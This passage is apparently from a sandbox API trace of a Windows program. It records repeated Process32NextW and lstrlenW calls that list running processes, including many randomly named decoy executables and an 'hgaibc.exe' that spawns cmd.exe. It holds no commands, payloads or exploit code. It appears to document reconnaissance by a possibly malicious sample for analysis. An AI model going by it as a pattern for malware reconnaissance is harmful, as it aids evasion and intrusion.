th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0063.233] lstrlenW (lpString="wininit.exe") returned 11 [0063.233] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.234] lstrlenW (lpString="csrss.exe") returned 9 [0063.234] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0063.235] lstrlenW (lpString="winlogon.exe") returned 12 [0063.235] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0063.236] lstrlenW (lpString="services.exe") returned 12 [0063.236] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0063.237] lstrlenW (lpString="lsass.exe") returned 9 [0063.237] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.238] lstrlenW (lpString="svchost.exe") returned 11 [0063.238] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0063.239] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0063.239] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0063.240] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0063.240] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.241] lstrlenW (lpString="svchost.exe") returned 11 [0063.241] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0063.242] lstrlenW (lpString="dwm.exe") returned 7 [0063.242] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.243] lstrlenW (lpString="svchost.exe") returned 11 [0063.243] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.244] lstrlenW (lpString="svchost.exe") returned 11 [0063.244] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.245] lstrlenW (lpString="svchost.exe") returned 11 [0063.245] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.246] lstrlenW (lpString="svchost.exe") returned 11 [0063.246] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.246] lstrlenW (lpString="svchost.exe") returned 11 [0063.247] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.247] lstrlenW (lpString="svchost.exe") returned 11 [0063.247] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.248] lstrlenW (lpString="svchost.exe") returned 11 [0063.248] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.249] lstrlenW (lpString="svchost.exe") returned 11 [0063.249] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.250] lstrlenW (lpString="svchost.exe") returned 11 [0063.250] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0063.251] lstrlenW (lpString="spoolsv.exe") returned 11 [0063.251] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.252] lstrlenW (lpString="svchost.exe") returned 11 [0063.252] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.253] lstrlenW (lpString="svchost.exe") returned 11 [0063.253] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0063.254] lstrlenW (lpString="audiodg.exe") returned 11 [0063.254] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0063.255] lstrlenW (lpString="sihost.exe") returned 10 [0063.255] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.256] lstrlenW (lpString="svchost.exe") returned 11 [0063.256] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0063.257] lstrlenW (lpString="taskhostw.exe") returned 13 [0063.257] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0063.258] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0063.258] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0063.259] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0063.259] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0063.259] lstrlenW (lpString="explorer.exe") returned 12 [0063.259] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0063.260] lstrlenW (lpString="Memory Compression") returned 18 [0063.260] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0063.654] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0063.654] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0063.683] lstrlenW (lpString="SearchUI.exe") returned 12 [0063.683] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0063.684] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0063.684] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0063.684] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0063.684] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0063.685] lstrlenW (lpString="taskhostw.exe") returned 13 [0063.685] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0063.686] lstrlenW (lpString="UsoClient.exe") returned 13 [0063.686] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0063.687] lstrlenW (lpString="taskhostw.exe") returned 13 [0063.687] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0063.687] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0063.687] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0063.688] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0063.688] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0063.689] lstrlenW (lpString="msoia.exe") returned 9 [0063.689] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0063.690] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0063.690] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0063.691] lstrlenW (lpString="screensaver.exe") returned 15 [0063.691] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0063.692] lstrlenW (lpString="xml upper.exe") returned 13 [0063.692] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0063.693] lstrlenW (lpString="defeat preston.exe") returned 18 [0063.693] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0063.693] lstrlenW (lpString="boss isolated.exe") returned 17 [0063.693] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0063.694] lstrlenW (lpString="member.exe") returned 10 [0063.694] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0063.695] lstrlenW (lpString="chubby-er.exe") returned 13 [0063.695] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0063.696] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0063.696] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0063.697] lstrlenW (lpString="organization.exe") returned 16 [0063.697] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0063.698] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0063.698] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0063.699] lstrlenW (lpString="spray-roman.exe") returned 15 [0063.699] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0063.699] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0063.699] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0063.700] lstrlenW (lpString="tank attacks.exe") returned 16 [0063.700] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0063.701] lstrlenW (lpString="wires jacket.exe") returned 16 [0063.701] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0063.702] lstrlenW (lpString="values.exe") returned 10 [0063.702] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0063.703] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0063.703] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0063.704] lstrlenW (lpString="printersaerospace.exe") returned 21 [0063.704] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0063.705] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0063.706] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0063.707] lstrlenW (lpString="dllhost.exe") returned 11 [0063.707] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0063.708] lstrlenW (lpString="joke.exe") returned 8 [0063.708] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0063.709] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0063.709] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0063.709] lstrlenW (lpString="documents.exe") returned 13 [0063.709] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0063.710] lstrlenW (lpString="rebel.exe") returned 9 [0063.710] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0063.711] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0063.711] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0063.712] lstrlenW (lpString="conhost.exe") returned 11 [0063.712] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0063.713] lstrlenW (lpString="conhost.exe") returned 11 [0063.713] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0063.714] lstrlenW (lpString="hgaibc.exe") returned 10 [0063.714] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0063.714] lstrlenW (lpString="cmd.exe") returned 7 [0063.714] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0063.715] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0063.715] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0063.716] lstrlenW (lpString="conhost.exe") returned 11 [0063.716] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0063.717] lstrlenW (lpString="conhost.exe") returned 11 [0063.717] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, 